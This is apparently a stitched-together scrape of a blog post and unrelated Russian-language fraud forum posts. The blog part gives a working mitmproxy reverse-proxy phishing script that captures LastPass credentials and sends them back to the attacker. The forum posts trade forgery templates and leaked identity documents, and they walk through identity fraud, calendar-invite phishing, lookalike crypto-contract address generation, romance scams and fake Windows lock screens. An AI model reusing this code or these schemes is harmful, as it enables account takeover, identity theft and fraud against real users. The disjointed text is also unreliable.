[![a reverse proxy setup for malicious purposes](/proxy.php?image=https%3A%2F%2Fversprite.com%2Fwp- content%2Fuploads%2F2019%2F10%2Freverse-proxy-setup-malicious- intent.png&hash=d741e83878ae9e430234a6342959ca54)](https://versprite.com/blog/application- security/reverse-proxy-attack/attachment/reverse-proxy-setup-malicious- intent/)
In this scenario the Victim User will interact with AttackerDomain.com thinking they are talking to a legitimate service that is hosted at TargetDomain.com.
When Victim User makes a request to AttackerDomain.com , the reverse proxy will intercept the HTTP request and modify the HTTP header values (e.g. the Host header) and HTTP body (as needed) with a script. This allows the request to be passed to TargetDomain.com in a way that makes it seem like the request originated from Attacker’s Reverse Proxy and not from the Victim User requesting AttackerDomain.com.
Similarly, when the server at TargetDomain.com has a response to the HTTP request, the HTTP response will contain mentions of TargetDomain.com in the headers (e.g. domain-scoped cookies) and body (e.g. form POST URLs). Since Victim User’s user-agent is not aware of TargetDomain.com, the reverse proxy must modify the domains in the response. Otherwise, subsequent requests made by Victim User will be missing cookies or will be made to TargetDomain.com, circumventing the attacker’s reverse proxy.
Since Attacker’s Reverse Proxy has full control over all HTTP headers and content passed between Victim User and TargetDomain.com, it is advantageous to modify headers beyond just domains. For example, stripping headers related to cache control or setting the Content-Security-Header to unsafe values.
The HTTP proxy tool mitmproxy can be used to accomplish all the above. In short, the mitmproxy allows interactive traffic examination and modification of HTTP traffic. Simplistic modifications can be performed with regular expressions via the command line. More advanced modifications can be done with Python 3 and the mitmproxy library.
Utilizing reverse proxies offers a more advanced approach for creating phishing websites that not only allow the Victim User to fully authenticate to their account through a malicious site, but also how to automate the theft of information within the account.
In this example, we are going to target LastPass, a commonly used cloud-based password management solution. [Learn more about how LastPass works at a high level here](https://versprite.com/blog/application-security/password-database- compromised/).
Rather than phish for the master password, what we are going to do is spin up a reverse proxy on a malicious domain and utilize Python scripting to inject JavaScript into the authentication process. This code will send us the URLs, usernames, and passwords in real-time when a user authenticates to our server.
During the authentication process, we see a request to the following URL: https://lastpass.com/m.php/newvault
The response is a JavaScript file. Analyzing this code, we realize that it handles many of the client-side operations for database encoding and decoding, encryption and decryption, master password changes, etc.
Because we are interested in capturing credentials as they are decrypted in real-time, we focus on the following for loop in the postacctsload() function:
On line 5440 we see a for loop incrementing through sites (g_sites[a].url) and decoding them with AES.hex2url. Once the sites are decoded, the usernames are decrypted with the function lpmdec_acct for each site. Within this function we do not see password being decrypted. However, this is fine as the lpmdec_acct function will decrypt those as well.
Within the for loop on line 5440 in the last statement, we see the following code:
While not an interesting line of code, it is unique. So, what we can do is use mitmproxy to find this code and then replace it with the following JavaScript:
b[g_sites[a].aid] = g_sites[a];
The idea here is that a for loop will iterate through URLs, decrypt the usernames and passwords, base64-encode them, and then the user-agent will make a jQuery GET request back to the proxy server to log the credentials. The tag CREDZZZ is used so that these requests can be picked out of other requests.
To accomplish the totality of the attack with mitmproxy, we can utilize the “-s” switch to run it with custom Python 3 code. The command we can use is the following:
Finally, lpmitm-https.py is the following:
import mitmproxy
import base64
import urllib
import re
sitePhishing = b"lastpass.secure-site.dev"
siteLastPass = b"lastpass.com"
siteException = b"lp-cdn.lastpass.com"
def request(flow):
flow.request.headers.pop("If-Modified-Since", None)
flow.request.headers.pop("Cache-Control", None)
flow.request.headers.pop("referer", None)
for key in flow.request.headers:
hdr_values = flow.request.headers.get_all(key)
hdr_values = [re.sub(sitePhishing.decode("utf-8"),
siteLastPass.decode("utf-8"), s) for s in hdr_values]
flow.request.headers.set_all(key, hdr_values)
flow.request.content = flow.request.content.replace(sitePhishing,siteLastPass)
the URL.
and password.
if "CREDZZZ" in flow.request.path:
r = flow.request.path.split('/')
s = len(r)
text_file = open("Output.txt", "a")
text_file.write("---\n")
text_file.write("URL = " + base64.b64decode(r[s-3]).decode('utf-8') + "\n")
text_file.write("Username = " + base64.b64decode(r[s-2]).decode('utf-8') +
"\n")
text_file.write("Password = " + base64.b64decode(r[s-1]).decode('utf-8') +
"\n")
text_file.write("\n")
text_file.close()
def response(flow):
flow.response.headers.pop("Strict-Transport-Security", None)
flow.response.headers["Referrer-Policy"] = "no-referrer"
for key in flow.response.headers:
hdr_values = flow.response.headers.get_all(key)
hdr_values = [re.sub(siteLastPass.decode("utf-8"),
sitePhishing.decode("utf-8"), s) for s in hdr_values]
flow.response.headers.set_all(key, hdr_values)
flow.response.content = flow.response.content.replace(siteLastPass,sitePhishing)
CDN.
rule.
flow.response.content = flow.response.content.replace(b"lp-
cdn."+sitePhishing,siteException)
flow.response.headers["content-security-policy"] = "default-src * 'unsafe- inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src
The entire attack from the perspectives of both the victim (left) and the attacker (right) can be seen in the following video:
As can be seen in the video, when the user authenticates to LastPass the Python script with mitmproxy injects the JavaScript to decrypt the usernames and passwords and sends the results to the attacker in real-time.
By the time the page fully loads, the attack is complete, and the user has no further recourse.
One caveat to this attack is that the victim user will likely receive an email indicating that they are authenticating from a new location and must approve this. In a local attack, location verification will likely not be necessary.
However, in remote attacks the user will receive this email by default. Likely, the user will approve this since they had just attempted to authenticate and were warned that they would need to approve this:
[![Lastpass-check-email-grant- access](/proxy.php?image=https%3A%2F%2Fversprite.com%2Fwp- content%2Fuploads%2F2015%2F10%2FLastpass-check-email-grant- access.png&hash=c4f1c750b3dfda744e526860be433c91)](https://versprite.com/blog/application- security/reverse-proxy-attack/attachment/lastpass-check-email-grant-access/)
[![Lastpass-check-email-grant- access](/proxy.php?image=https%3A%2F%2Fversprite.com%2Fwp- content%2Fuploads%2F2015%2F10%2Flastpass- verifications.png&hash=a17280e2df040cbad336588e055ca67e)](https://versprite.com/wp- content/uploads/2015/10/lastpass-verifications.png)
In a targeted attack, the geolocation of the attacker’s server can be set to match the location of the target’s location.
However, it is certain that several victim users will ignore the text of the email and simply click on the “Verify my New Location” box, not bothering to notice that they attempted to login from Switzerland rather than Atlanta, Georgia.
If the victim user verifies the new login location, then the IP address of the attacker’s reverse proxy will be whitelisted for that account.
If the target victim does not attempt to reauthenticate through the reverse proxy (instead opting to login at the verification page), then the attacker can phish the target victim again later and no further verifications will be requested.
If the user disabled location verification in their account settings, then the first phish will be successful.
Due to the way LastPass’s authentication and database decryption work, simply proxying traffic and sniffing for the login hash vla.hash will not be sufficient to compromise the account.
If the attacker wishes to do so, they can inject JavaScript code to capture the plaintext password.
Then when the user verifies their new login location (the IP address of the reverse proxy), the attacker can attempt to authenticate to the victim user’s LastPass account using this password.
If 2FA is in the way, the attacker will still need to obtain the code from the user. Again, this is where the reverse proxy comes in handy as it will handle all of that. Attempting to ask for the 2FA directly, such as over SMS or phone, may raise suspicions depending on the target.
Other platforms tend to be less restrictive with regards to new device/new location verification. For example, using this reverse proxy attack to target email accounts work well because there is not likely any other out-of-band method setup to verify a new login.
In addition, in many of our client engagements we have used reverse proxies to authenticate to remote access sites, team collaboration platforms, cloud storage, etc. and have not had to deal with new device/new location verifications.
In the few cases that we have had to deal with it, it was easy to trick the victim user again. When someone can be tricked once, the second time is often just as easy as the first when the reverse proxy they are interacting with acts just as real as the actual site they are so familiar with.
Доброго времени суток! Кто может подсказать как с этим бороться. При рассылке по мылам, домен блокирую и появляется красное окно, черерз 2-8 часов с начала рассылки. Рассылается фишинговая страница соц сетей. Пробовал менять верстку, хосты, ставил клоаку (более менее решал на продолжительность ссылок (отключение OC WINOWS) боты сразу попадали на левый вайт. Но к сожалению вопрос никак не решился
Состав архива:
- Шрифты
- PSD макеты ( связной / почта россии / tipico / паспорта / свидетельство )
- Видео инстуркции
- Печати
- Галограммы рф psd
другое
Размер архива: 1.44Gb
Hidden content for authorized users.
](http://www.mediafire.com/file/l4pcc931z2kvsb4/ОТРИСОВКА.zip/file)
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Ребята есть у кого EMV Reader/Writer ?
Если не жалко, поделитесь пожалуйста.
Всем доброго времени!
Вопрос:
Работа на бадо с добрыми доверчивыми любвиобильными мамантятами)
Если работать в англоговорящих и франкоговорящих странах какими площадками и
банками посоветуете пользоваться для приёма подарков электронных денег. Раньше
можно было решить вопрос через локалбиткоин сейчас лемит ограничен пройти
повышение статуса пока непредоставляется возможным.
нахожусь в рашке.
Также бы хотелось найти желающих партнёров, одна голова хорошо а две лучше.
Если будут предложения пишите.
Рашка наверно отработана вся, по мелочам надоело царапать.
Есть такая тема. Закрытая уже правда, но есть.
Суть схемы
Чувак находит себе людей для "сотрудничества" за 50%, любой процент по сути.
Далее мы выступаем в роли финансовой поддержки его схемы
Начинает рассказы про кошельки с функцией RBF, которые могут отменять транзакцию, такие как Trustee или же Electrum (для тех кто не знает), далее длинные расскажи про блоки и мемпул, то что чем больше мемпул, тем транза будет медленнее доходит, это так.
После он приводит нам "мамонта" (он сам же), которому нужно залить баланс на
кошелек blockchain
Дальше что именно на кошельке blockchain мы видим при поступлении BTC уже
якобы подтвержденную транзакцию, и баланс на самом кошельке, но на самом деле
он еще не дошел
Мы же с этих кошельков и производим отмену, то есть удостоверились, то что да,
эта схема реально работает
Начинаем с ним "сотрудничать", заливаем первому "мамонту" (на самом деле ему
же) неопределенное количество баланса, пусть будет это к примеру $50 для
начала
Дальше происходит так, что мы ждем секунд 30 или 1 минуту с 12к транзакций на
пуле, но наша сразу же попадает в первый блок и у нас появляется первый
конфирм (после которого мы не можем отменить транзакцию), хотя мы в прошлый
раз пробовали и у нас это заняло достаточно времени, а если быть точнее полдня
Будет создана тема в разделе криптовалют с вопросом, как же попасть в первый блок и получить первое подтверждение за минуту, надеюсь появятся знатоки и ответят на данный вопрос ?, ссылка будет ниже
Good morning) A couple of years ago I bought a Yota SIM card and I needed to change the number, after the change I sent the word balance to the number 900, and bam 13000 on the card! But there was less on my card, and then I realized that the card was not linked to mine. In general, if someone has access to Yota SIM cards, then, as they say, it's a matter of technology.
Документы людей Объединенных Арабских Эмиратов.
850 файлов, включая национальную карточку, удостоверение личности, паспорт,
резюме и другие документы.
размер : 1 ГБ
Hidden content for authorized users.
passport.7z/file)
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
пароль местный
Добавить номер в BG фулки
1. Идём в experian.com регистрируемся и пишем во время рега наш номер
2. Звоним в experian 800-4930-1058
Monday through Friday 6:00 a.m. tp 8:00 p.m. Pactific Time. To reach representalive you will nead to enter you will nead to select option #2, you will hear anothe recording and younwill nead to select option #1, anothe recording and will play, select option #1. There may a bit, of hold time, depending on the call volume at the time you maycall, and the representalive may omly assist youtnwil Experian information, not Trandunion or Equlfax.
3. Идём в listyourself.net кликаем individual, пишем все данные, номер наш, затем ADD LISTING
4. Ждём подтверждения от экспериана и от листёрселфа на имейлы
5. Как номер добавился в BG начинаем проходить id.me Делаем только паспорта uload не делаем! Нажимаем TAKE A PICTURES FROM PHONE
6. Фоткаем паспорт, можно фоткать с ipad или хорошего качества экрана!
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/Nm5ilBgJ#QqyctzjRw5vylJ5R0eDAtoR72uOaRpYvPzWiXtP0qSY)
mega.nz
Делать было нечего , дело было вечером .
Смотреть landing(*) строго на мобильных ...он будет менее ужасным -_-
Скрины
Spoiler: 1
Spoiler: 2
Spoiler: 3
Логин : admin
Пароль : 12345
You must have at least 5 reaction(s) to view the content.
_* - Не уверен что 'это' можно считать landing,om . Тапки не кидайте если что )_
доброго времени суток! собственно вопрос в названии темы. есть генераторы
паспортов,айди карт и т.д. а фото с паспортом или айди картой у лица никто не
встречал?
напрашивается сразу вариант с отрисовкой в фотошопе, но возможно есть
автоматизированные сервисы где можно было бы подгрузить фото лица и фото
паспортаи получить на выходе более-менее приемлемое качество
Есть ли возможность снять 2Fa с бинанса ( не имея доступа к почте )?
Ищу человека со знанием английского:
-Ответственность
-Адекватность
-Внимательность
-Уметь быстро отталкиваться от ситуации
-Свободное время
Если у вас нулевые знания в прозвоне,то я вас всему научу,что и как настроить!
Первый контакт через пм!
Вы когда-нибудь задумывались о том, как работают приглашения на встречи в Microsoft Teams и Google Meet? Недавно я занимался вопросом социальной инженерии, и у меня в голове возникла случайная мысль: как на самом деле работают приглашения на встречи, можно ли как-то использовать их в мошеннических схемах?
Да, такая мысль уже обсуждалась ранее, и этот метод уже использовали. Но никто нигде не объяснял, как он работает. Мне не удалось найти ни одного блога, который технически описывает эту атаку. Поэтому я решил покопаться в ней сам, чтобы человеческим языком рассказать всем, кто интересуется пентестами и вопросами безопасности в целом.
Отправить поддельное приглашение на встречу, создав ощущение срочности, чтобы жертва не пыталась разобраться в вопросе, а просто перешла по моей ссылке, запрашивающей учётные данные.
Создание встречи (в Outlook) обычно работает следующим образом:
Создание встречи в Outlook
Так выглядит приглашение на встречу
Когда вы создаёте приглашение на встречу, вы фактически отправляете обычное электронное письмо с вложенным файлом iCalendar. В зависимости от почтового клиента получателя письма и того, как этот клиент обрабатывает iCalendar, вы можете увидеть красивый email или простое письмо с вложением. Ниже вы можете увидеть, как выглядит приглашение на собрание команды в protonmail.
Согласно Википедии :
« Универсальный формат iCalendar позволяет пользователям хранить и обмениваться информацией своего календаря и расписания (например, события, задачи, информация о свободном/занятом времени). Файл iCalendar сохраняется в текстовом формате и содержит событие или задачу; используется для отправки событий или задач другим пользователям, которые могут импортировать их в свои календари. Обычно имеет расширение .ics »
iCalendar поддерживается Outlook, календарём Google, Yahoo, Apple и многими другими. В этой статье я сосредоточусь на Outlook.
Ниже вы можете увидеть мою версию iCalendar для приглашения на групповую встречу. Я просто отправил приглашение на встречу на свой адрес в protonmail, загрузил его и прочитал вложение.
Code:Copy to clipboard
BEGIN:VCALENDAR
METHOD:REQUEST
PRODID:Microsoft Exchange Server 2010
VERSION:2.0
BEGIN:VTIMEZONE
TZID:GTB Standard Time
BEGIN:STANDARD
DTSTART:16010101T040000
TZOFFSETFROM:+0300
TZOFFSETTO:+0200
RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10
END:STANDARD
BEGIN:DAYLIGHT
DTSTART:16010101T030000
TZOFFSETFROM:+0200
TZOFFSETTO:+0300
RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3
END:DAYLIGHT
END:VTIMEZONE
BEGIN:VEVENT
ORGANIZER;CN=ExAndroid Developer:mailto:<redacted>@outlook.com
ATTENDEE;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP=TRUE;CN=<redacted>@protonmail.com:mailto:<redacted>@protonmail.com
DESCRIPTION;LANGUAGE=en-US:<stripped>\n\n
UID:040000008200E00074C5B7101A82E00800000000508CC0468E28D701000000000000000
01000000096DF011F20A29943A70B5DA5047021A5
SUMMARY;LANGUAGE=en-US:Test meeting
DTSTART;TZID=GTB Standard Time:20210403T000000
DTEND;TZID=GTB Standard Time:20210404T000000
CLASS:PUBLIC
PRIORITY:5
DTSTAMP:20210403T103619Z
TRANSP:OPAQUE
STATUS:CONFIRMED
SEQUENCE:0
LOCATION;LANGUAGE=en-US:Microsoft Teams Meeting
X-MICROSOFT-CDO-APPT-SEQUENCE:0
X-MICROSOFT-CDO-OWNERAPPTID:-570210331
X-MICROSOFT-CDO-BUSYSTATUS:TENTATIVE
X-MICROSOFT-CDO-INTENDEDSTATUS:BUSY
X-MICROSOFT-CDO-ALLDAYEVENT:FALSE
X-MICROSOFT-CDO-IMPORTANCE:1
X-MICROSOFT-CDO-INSTTYPE:0
X-MICROSOFT-SKYPETEAMSMEETINGURL:https://teams.microsoft.com/l/meetup-join/
19%3ameeting_YmM1MjRmMTktYjA2N<stripped>cd8%22%7d
X-MICROSOFT-SCHEDULINGSERVICEUPDATEURL:https://api.scheduler.teams.microsof
t.com/teams/dc<stripped>DAyMmZj@thread.v2/0
X-MICROSOFT-SKYPETEAMSPROPERTIES:{"cid":"19:meeting_YmM1MjRmMTktYjA2Ny00YWQ
4LWI1NWEtZmE1NGVlMDAyMmZj@thread.v2"\,"private":true\,"type":0\,"mid":0\,"
rid":0\,"uid":null}
X-MICROSOFT-ONLINEMEETINGCONFLINK:conf:sip:<redacted>\;gruu\;opaque=
app:conf:focus:id:teams:2:0!19:meeting_YmM1MjRmMTktYjA2Ny00YWQ4LWI1NWEtZmE
1NGVlMDAyMmZj-thread.v2!56474ffc245241c5ab4081a127cc1cd8!dcf23acb18fc41d28
6acf752f1ca658d
X-MICROSOFT-DONOTFORWARDMEETING:FALSE
X-MICROSOFT-DISALLOW-COUNTER:FALSE
X-MICROSOFT-LOCATIONS:[ { "DisplayName" : "Microsoft Teams Meeting"\, "Loca
tionAnnotation" : ""\, "LocationSource" : 0\, "Unresolved" : false\, "Loca
tionUri" : "" } ]
BEGIN:VALARM
DESCRIPTION:REMINDER
TRIGGER;RELATED=START:-PT15M
ACTION:DISPLAY
END:VALARM
END:VEVENT
END:VCALENDAR
Здесь нужно понимать, что каждый объект iCalendar начинается с BEGIN: VCALENDAR и заканчивается END: VCALENDAR . Часть встречи находится между BEGIN: VEVENT и END: VEVENT. Внутри вашего мероприятия вы указываете так называемые компоненты. Обычно требуются не все компоненты, и в моем POC вы можете найти урезанный файл *.ics с только необходимыми компонентами. Большинство из них самоочевидны, но я отмечу самые интересные из них.
ORGANIZER. Указывает имя и адрес электронной почты организатора встречи. Вы можете указать здесь любой email и имя, чтобы казалось, что приглашение на собрание исходит от этого человека.
ATTENDEE. Указывает участников встречи. Если вам нужно много участников, у вас будет несколько компонентов ATTENDEE. Имейте в виду, что участники не получат электронное письмо с приглашением на собрание, оно предназначено только для отображения. Вы можете легко имитировать присутствие 30 человек на собрании, если на самом деле отправляете электронное письмо одной жертве.
X-MICROSOFT-SKYPETEAMSMEETINGURL. Е сли вы укажете этот компонент, в напоминании о встрече будет отображаться кнопка «Подключиться». К сожалению, при нажатии система попытается открыть указанный URL-адрес через приложение для рабочих столов, что приводит к ошибке.
DTSTART, DTSTAMP , DTEND. Указывают время встречи и её продолжительность. Я проделал хитрый трюк и установил время начала встречи на 5 минут раньше текущего времени, таким образом складывается ощущение, что вы опоздали на встречу на 5 минут. Когда жертва получает email, Outlook обрабатывает его как приглашение на встречу. Видит, что встреча началось 5 минут назад, и сразу же отображает напоминание на экране. Это помогает симулировать срочность.
Как вы думаете, сколько человек в разгар рабочего дня кликнули бы по ссылке,
видя, что опаздывают на встречу?
В этой статье я показал, как Outlook обрабатывает приглашения на собрания. Это должно работать с любым провайдером/клиентом email-сообщений, который обрабатывает вложения *.ics. Вы можете проверить мой POC на github и отредактировать скрипт и шаблоны в соответствии со своими потребностями.
Привет форумчане. Думаю вам будет интересно почитать,может кто-то возмет на вооружение и добьется большего.
В статье описано 2 метода
1. как создать смарт контракт с адресом похожим на любой другой (пригодится
для создания фейковых смарт контрактов)
2. генерируем ключи,адреса
Идея генерировать миллионы новых адресов,или создать смарт контракт с адресом например схожим на адрес какого-нибудь ICO проекта зародилась у меня еще в конце 2018 года.
Часть 1
Этот метод будет на руку тем,кто занимается фишингом в сфере крипты.
Задумывались ли вы когда нибудь как вообще создается адрес в сети эфириум?
А как создается адрес смарт контракта?
Не буду слишком глубоко вникать в теорию,приводить формулы и показывать график
эллиптической кривой и тд.
Если коротко,то любой смарт-контракт, в сети Ethereum имеет уникальный адрес.
На первый взгляд адрес смарт-контракта выглядит случайным, но на самом деле
адрес смарт-контракта– это хеш адреса отправителя транзакции и значения nonce
(nonce это число исходящих транзакций с этого адреса)
Формула : deployed_address = sha3(rlp.encode([sender, nonce]))
Если кратко, то например адрес DAI Stablecoin в сети эфириум это - 0x6b175474e89094c44da98b954eedeac495271d0f
Ок, попробуем создать смарт контракт с похожим адресом
Сначала скрипт генерирует приватный ключ
Code:Copy to clipboard
function randstr(){
var chars='0123456789abcdef';
var strlen=64;
var randomstr='';
for(var i=0;i<strlen;i++){
var rnum=Math.floor(Math.random()*chars.length);
randomstr+=chars.substring(rnum,rnum+1);
}
return randomstr;// это рандомно сгенерированный приватный ключ
Дальше, из этого ключа создается адрес (это еще не адрес смарт контракта,а просто обычный адрес,назовем его для простоты адресом кошелька)
Code:Copy to clipboard
var priv=randstr();
var generatorpoint=ec.g;
var pubkeycord=generatorpoint.mul(priv);
var x=pubkeycord.getX().toString('hex');
var y=pubkeycord.getY().toString('hex');
var publickey=x+y;
var hashpublic=keccak256(new Buffer.from(publickey,'hex'));
var adr=new Buffer.from(hashpublic,'hex');
adr=adr.slice(-20).toString('hex');
adr='0x'+adr;// это будет адрес сгенерированный из нашего приватного ключа
Далее,как мы получаем смарт контракт с нужными символами в начале и в конце адреса?
Code:Copy to clipboard
for(var i=0;i<10;i++){
/*
Я тут указал значение максимального nonce 10,больше указывать смысла нет,потому что при деплое в сеть смарт контракта нам нужно будет вручную увеличивать nonce у отправляющего адреса. Ниже подробно напишу об этом
*/
var nonce=i;
nonce=nonce.toString();
if(nonce=='0'){nonce='0a';}
var hex=converter.decToHex(nonce);
var sender = adr;
sender=sender.toString();
var input_arr = [ sender, hex ];
var rlp_encoded = rlp.encode(input_arr);
var contract_address_long = keccak('keccak256').update(rlp_encoded).digest('hex');
var contract_address = contract_address_long.substring(24);
contract_address = '0x'+contract_address;
contract_address=contract_address.toString();
var cont_adr_cut_front=contract_address.substring(0,5); // substring(0,5 )если хотим чтобы спереди было например 5 нужных нам символов, а если 4 то указываем substring(0,4) тд
cont_adr_cut_front=cont_adr_cut_front.toString();
var cont_adr_cut_back=contract_address.substring(40,42); // с конца получим 2 нужных символа
//а если хотим например чтобы было 4 символа то указываем substring(38,42)
cont_adr_cut_back=cont_adr_cut_back.toString();
console.log(''+cont_adr_cut_front+' '+cont_adr_cut_back+'');
if(cont_adr_cut_back=='0f' && cont_adr_cut_front=='0x6b1'){ // указываем тут какие символы хотим вначале и сзади
console.log('Найдено'+cont_adr_cut_back);
var alldata='generated key: '+priv+' generated address: '+adr+' nonce: '+nonce+' nuzhniy contract: '+contract_address+'\r\n';
ms.push(alldata);
fs = require('fs');
fs.writeFile('Gener-adr2.txt', ms, function(err){ // запишем все в текстовый файл (приватный ключ,сгенерированный адрес,nonce и адрес будущего сгенерированного смарт контракт)
if (err) return console.log(err);
});
} //else {console.log('NO '+nonce+'');}
} //for
Получилось следующее
Ключ 4625ce80606d3fc31566894ce39a5121356666b9ca3a41ff06bf68f18a4f859a
Адрес 0x5162cb8d3dd3a93b1358e35832fd5fe402858075
Nonce 7
У нас есть приватный ключ,импортируем его в метамаск.
Теперь у нас есть нужный эфириум адрес.
Nonce свежегенерированного адреса равен 0,в данном случае нам нужно чтобы он
был равен 7,чтобы получить нужный адрес.
Просто вручную с этого адреса 6 раз отправляем на наш другой адрес немного
эфира (хоть 0.0000000000001).да это затратно,но nonce по другому невозможно
искусственно повысить,для того и я указал в скрипте что максимальное значение
nonce я ставлю 10
После того как мы сделали 6 транзакций идем на https://remix.ethereum.org/
Это код простого смарт контракта,который принимает эфир,а также дает возможность вывести эфир и токены со своего баланса
Code:Copy to clipboard
pragma solidity 0.5.17;
interface erc20_token{
function transfer(address _to, uint256 _value) external returns (bool);
}
contract Exploit {
string public name;
address owner;
mapping(address => uint256) balances;
constructor() public {
owner = msg.sender;
name='FORUM exploit.in/topic/187486/';
}
function() external payable {}
// vivod ETH
function withdraw_eth(address payable _kuda) public {
require(owner == msg.sender);
_kuda.transfer(address(this).balance); // vidod vsego ETH s balansa
}
// vivod ERC20 tokenov
function withdraw_erc20(uint256 _val,address token_adr,address _komu) public{
require(owner == msg.sender);
erc20_token(token_adr).transfer(_komu,_val); }
}
Заливаем смарт контракт в сеть. Смотрим, чтобы injected address был тот который мы сгенерировали, иначе с другого адреса получится смарт контракт с другим адресом.
Жмем Deploy
Enable optimisation я не выбрал галочку
Жмем на Verify and Publish чтобы смогли взаимодействовать с контрактом
Указываем данные так как на Remix (тип компиляции 1 файл,версия компилятора та же что и была выбрана на Remix,без лицензии)
Попадаем на след страницу.Сюда копируем и вставляем код смарт контракта
Если все сделано правильно то контракт будет успешно задеплоен,о чем увидите соответствующую надпись и пройдя по адресу смарт контракта увидите поля для работы с функциями
Сгенерированный смарт контракт
![kovan.etherscan.io](/proxy.php?image=https%3A%2F%2Fetherscan.io%2Fimages%2Fbrandassets%2Fetherscan- logo-circle.jpg&hash=882829226246dd3b0bad96e6cdddcd22&return_error=1)
The Contract Address 0x6b1efdd7340dd248b166c8e656117f345c2c5e0f page allows users to view the source code, transactions, balances, and analytics for the contract address. Users can also interact and make transactions to the contract directly on Etherscan.
kovan.etherscan.io
А это адрес реального DAI https://etherscan.io/address/0x6b175474e89094c44da98b954eedeac495271d0f
Как видите спереди 0x6b1 и в конце 0f схожи. Если запустить скрипт на каком либо VPS сервере и на более долгое время,то одинаковых символов можно найти больше (так как пишу статью и делаю скрины,то пришлось довольствоваться малым количеством символов. В данном случае ушло меньше часа на моем стареньком Lenovo 2012г)
Другие сгенерированные адреса
Адрес Compound
https://etherscan.io/address/0xc00e94cb662c3520282e6f5717214004a7f26888
Фейк
![kovan.etherscan.io](/proxy.php?image=https%3A%2F%2Fetherscan.io%2Fimages%2Fbrandassets%2Fetherscan- logo-circle.jpg&hash=882829226246dd3b0bad96e6cdddcd22&return_error=1)
The Contract Address 0xc0050568448f885bd9773d254d3ab200c4fa7888 page allows users to view the source code, transactions, balances, and analytics for the contract address. Users can also interact and make transactions to the contract directly on Etherscan.
kovan.etherscan.io
Адрес tokena Uniswap (uni)
](https://info.uniswap.org/#/tokens/0x1f9840a85d5af5bf1d1762f925bdaddc4201f984)
Swap or provide liquidity on the Uniswap Protocol
info.uniswap.org
Фейк
![kovan.etherscan.io](/proxy.php?image=https%3A%2F%2Fetherscan.io%2Fimages%2Fbrandassets%2Fetherscan- logo-circle.jpg&hash=882829226246dd3b0bad96e6cdddcd22&return_error=1)
The Contract Address 0x1f9f5f873fb7f50ddc5ca8b096a25eaaf1e64984 page allows users to view the source code, transactions, balances, and analytics for the contract address. Users can also interact and make transactions to the contract directly on Etherscan.
kovan.etherscan.io
Настоящий адрес токена USDC
https://etherscan.io/address/0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48
фейк: 0xa091a4bb56e72431cd8559acaa0407f230e13b48
Можно создать несколько js файлов чуть откорректировав строки,где надо указать какие символы хотите получит в конце и в начале и можно запустить параллельно несколько окон
Часть 2
Этот скрипт просто генерирует адрес и проверяет есть ли в нем баланс
Code:Copy to clipboard
const http = require('http');
const hostname = 'localhost';
const port = 3000;
// packages
const rlp = require('rlp');
const keccak = require('keccak');
var converter = require('hex2dec');
const EC=require('elliptic').ec;
const ec=new EC('secp256k1');
const keccak256=require('js-sha3').keccak256;
const Web3 = require("web3");
const web3 = new Web3(new Web3.providers.HttpProvider("https://mainnet.infura.io/v3/fa58565ce17d44628a6b20e5134*****")); укажите тут свой API токен от Infura
var ms=new Array();
setInterval(function()
{
//random string for privatekey
function randstr(){
var chars='0123456789abcdefABCDEF';//символы для создания ключа
var strlen=64;
var randomstr='';
for(var i=0;i<strlen;i++){
var rnum=Math.floor(Math.random()*chars.length);
randomstr+=chars.substring(rnum,rnum+1);
}
return randomstr;//this is returned privatekey
}
var priv=randstr();
var generatorpoint=ec.g;
var pubkeycord=generatorpoint.mul(priv);
var x=pubkeycord.getX().toString('hex');
var y=pubkeycord.getY().toString('hex');
var publickey=x+y;
var hashpublic=keccak256(new Buffer.from(publickey,'hex'));
var adr=new Buffer.from(hashpublic,'hex');
adr=adr.slice(-20).toString('hex');
adr='0x'+adr;
ms.push('\r\n');
ms.push(priv,adr);
web3.eth.getBalance(adr, function(err, result) {
if (err) {
console.log(err)
} else {
var balance=web3.utils.fromWei(result, "ether");
ms.push(balance);
console.log('address: '+adr+ ' balance: '+balance+' ETH')
//Запишем в текстовый файл если нашли баланс
if(balance>0.001){
fs = require('fs');
fs.writeFile('naydenbalans.txt',ms,function(err){
if (err) return console.log(err);
});
}
}
})
},1000); // генерация адреса каждую секунду
Спасибо за чтение,думаю кому то реально поможет
Автор @dobush
источник конкурс exploit.in
Hey guys!
Few months ago I made a Outlook mail login page clone, but never got around using it.
I coded it completely from scratch using a little bootstrap helper classes, and reached pixel perfect 1v1 copy. I even wrote custom Javascript to simulate EXACT behavior of step switching when error is presented, and Enter is pressed vs clicked.
Login: <https://i.ibb.co/VpFsG3q/Screenshot-2021-02-16-Sign-in-to-your-
Microsoft-account.png>
Panel: https://ibb.co/kHrpP1c (Yes, I named it EvilN3m0, since I did plan to
develop this further some day.
Obviously in the latest few months the design has changed, but I can readjust it. The big question is, if is anyone interested in something like this?
Доступ к учетным данным ОС Windows можно получить через простую подмену экрана блокировки. Рассказываем о популярных программах для таких атак.
Современные методики пентеста часто базируются на языке программирования C#, поскольку программы на нем могут выполняться через различные фреймворки (Cobalt Strike, Covenant и др.)
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fae%2Fvf%2F-w%2Faevf-
wj3yppuqxbhf-b11gy_5vs.jpeg&hash=1f8ed46e668db9fc88c9ce8b269bbea4)
FakeLogonScreen — запуск
FakeLogonScreen — блокировка экрана
При вводе пароля на фейковой странице входа FakeLogonScreen выполнит валидацию учетных данных в AD или локально, чтобы точно определить, верный ли пароль был введен. В дальнейшем пароль будет отображен в консоли пентестера.
FakeLogonScreen — Ввод учетных данных
Также в состав FakeLogonScreen входит второй вариант исполняемого файла, который сохраняет пойманные учетные данные в файл user.db локально на инфицированной машине. Данный файл может быть просмотрен с помощью команды type:
type C:\Users\testTHUser3\AppData\Local\Microsoft\user.db
FakeLogonScreen — сохранение в файл user.db
SharpLocker — блокировка экрана
